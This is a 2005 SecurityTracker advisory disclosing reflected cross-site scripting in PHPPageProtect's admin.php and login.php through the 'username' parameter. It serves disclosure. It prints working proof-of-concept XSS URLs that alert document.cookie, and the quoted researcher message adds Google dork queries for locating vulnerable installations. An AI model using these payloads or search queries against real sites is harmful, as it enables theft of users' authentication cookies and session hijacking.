SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHPPageProtect Vendors:   PHP.WarpedWeb.Net
PHPPageProtect Input Validation Holes in 'admin.php' and 'login.php' Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1014510
SecurityTracker URL:  http://securitytracker.com/id/1014510
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 18 2005
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 1.0.0, 1.0.0a
Description:   rgod reported an input validation vulnerability in PHPPageProtect. A remote user can conduct cross-site scripting attacks.

The 'admin.php' and 'login.php' scripts do not properly filter HTML code from user-supplied input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PHPPageProtect software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/[path]/admin.php?username="><script>alert(document.cookie)</script><!--
http://[target]/[path]/admin.php?username=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
http://[target]/[path]/login.php?username="><script>alert(document.cookie)</script><!--
http://[target]/[path]/login.php?username=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHPPageProtect software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  php.warpedweb.net/pageprotect/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHPPageProtect Version 1.0.0 / 1.0.0a XSS POC Exploit


PHPPageProtect Version 1.0.0 / 1.0.0a  XSS POC Exploit
 
6.28 18/07/2005
                           
xss:
http://[victim]/[path]/admin.php?username="><script>alert(document.cookie)</script><!--
http://[victim]/[path]/admin.php?username=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
http://[victim]/[path]/login.php?username="><script>alert(document.cookie)</script><!--
http://[victim]/[path]/login.php?username=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
 

googledorks:
inurl:login.php filetype:php PHPPageProtect
inurl:admin.php filetype:php PHPPageProtect
 

rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC